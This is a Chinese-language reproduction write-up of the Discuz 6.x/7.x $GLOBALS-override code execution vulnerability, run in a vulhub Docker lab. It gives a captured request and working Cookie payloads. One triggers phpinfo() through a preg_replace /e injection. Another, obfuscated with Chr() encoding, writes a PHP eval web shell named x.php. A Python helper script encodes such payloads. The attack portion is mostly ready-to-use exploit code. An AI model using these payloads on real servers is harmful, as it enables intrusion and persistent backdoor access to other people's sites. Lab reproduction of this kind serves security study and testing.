漏洞描述

PHP 5.3.x版本php.ini配置文件中request_order参数的默认值为GP,导致$_REQUEST不再包含$_COOKIE,攻击者可通过Cookie传入$GLOBALS覆盖全局变量,进一步实现代码执行。

影响版本

Discuz 6.x版本。

Discuz 7.x版本。

漏洞复现

git clone https://github.com/vulhub/vulhub.git
cd vulhub/discuz/wooyun-2010-080723
docker-compose up -d

环境启动之后直接访问http://<ip>:8080会显示Discuz! info: Can not connect to MySQL server错误,需要先在http://<ip>:8080/install页面安装Discuz,数据库地址填写为db,数据库及管理员密码自行填写即可:

1NMDDc

随机抓一个帖子的数据包:

GET /viewthread.php?tid=13&extra=page%3D1 HTTP/1.1
Host: <ip>
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<ip>/forumdisplay.php?fid=2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CFADMIN_LASTPAGE_ADMIN=%2FCFIDE%2Fadministrator%2Fhomepage%2Ecfm; 8p0_sid=uUasIs; 8p0_onlineusernum=1; 8p0_visitedfid=2; 8p0_oldtopics=D13D; 8p0_fid2=1645160609
Connection: close

将包发送到重放器,修改Cookie

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

发包后查看响应,成功返回phpinfo页面,同理可写shell,文件x.php,密码oopsdc

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(120).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(111).Chr(111).Chr(112).Chr(115).Chr(100).Chr(99).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59))
fputs(fopen)

ASCII及字符互换脚本:

import re

# ASCII 2 Word
def ascii2word(ASCII):
  for i in re.findall(r"(\d+)", ASCII):
    print(chr(int(i)), end="")
    
# Word 2 ASCII
def word2ascii(Word):
  ASCII = ""
  for j in Word:
    ASCII += "Chr(" + str(ord(j)) + ")."
  print(ASCII)
    
ascii = "Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(120).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(111).Chr(111).Chr(112).Chr(115).Chr(100).Chr(99).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59)"

word = "fputs(fopen('x.php','w'),'<?php @eval($_POST[oopsdc])?>');"

ascii2word(ascii)
word2ascii(word)

文章许可:本文采用CC BY-NC-SA 4.0许可协议,转载请注明出处。